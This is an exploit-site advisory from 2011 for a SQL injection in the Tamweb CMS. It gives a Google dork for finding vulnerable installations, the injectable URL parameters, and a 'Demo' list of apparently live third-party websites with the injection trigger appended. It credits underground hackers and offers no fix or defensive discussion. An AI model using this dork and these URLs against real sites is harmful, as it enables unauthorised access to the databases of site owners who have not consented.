Tamweb CMS SQL Injection Vulnerability



EKU-ID: 1303 CVE: OSVDB-ID:
Author: Mr.XHat Published: 2011-11-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Name: Tamweb CMS SQL Injection Vulnerability
# Type: ASP
# Category: Webapps
# Web Site: http://www.tamweb.ir/
# Google Dork: inurl:*.asp intext:"T@Mweb"
# Date: 4-Nov-2011
# Author: Mr.XHat
# Discovered By: Mr.XHat
# Tested On: Windows Server 2003 (IIS 6)
########################################

# Exploit

http://localhost/[Path]/article.asp?id=[SQLI]
http://localhost/News_Item.asp?content_ID=[SQLI]

# Demo:

http://www.tamweb.ir/blog/article.asp?id=21'
http://www.aria-atsez.com/content.asp?type=59'
http://exon-co.com/eproductlist-fa.asp?Content_ID=55'
http://www.aria-atsez.com/News_Item.asp?content_ID=26'

& More...
#########

Special Thanks To: #BHG Security Center And All Underground Hackers

Home: http://black-hg.org/cc/

Greets To: 1337day.com